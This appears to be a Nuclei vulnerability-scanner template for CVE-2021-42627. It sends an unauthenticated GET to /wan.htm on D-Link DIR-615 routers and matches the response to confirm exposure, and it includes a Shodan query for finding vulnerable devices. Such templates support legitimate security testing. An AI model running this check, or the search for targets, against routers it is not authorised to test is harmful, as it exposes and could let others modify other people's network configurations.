46 lines
1.3 KiB
YAML
46 lines
1.3 KiB
YAML
id: CVE-2021-42627
|
|
|
|
info:
|
|
name: D-Link DIR-615 - Unauthorized Access
|
|
author: For3stCo1d
|
|
severity: critical
|
|
description: |
|
|
D-Link DIR-615 devices with firmware 20.06 are susceptible to unauthorized access. An attacker can access the WAN configuration page wan.htm without authentication, which can lead to disclosure of WAN settings, data modification, and/or other unauthorized operations.
|
|
reference:
|
|
- https://github.com/sanjokkarki/D-Link-DIR-615/blob/main/CVE-2021-42627
|
|
- https://www.dlink.com/en/security-bulletin/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42627
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-42627
|
|
epss-score: 0.00641
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.title:"Roteador Wireless"
|
|
verified: true
|
|
tags: cve,cve2021,d-link,router,unauth,dir-615,roteador
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wan.htm"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");"
|
|
- "var ipv6conntype"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- Virtual Web
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|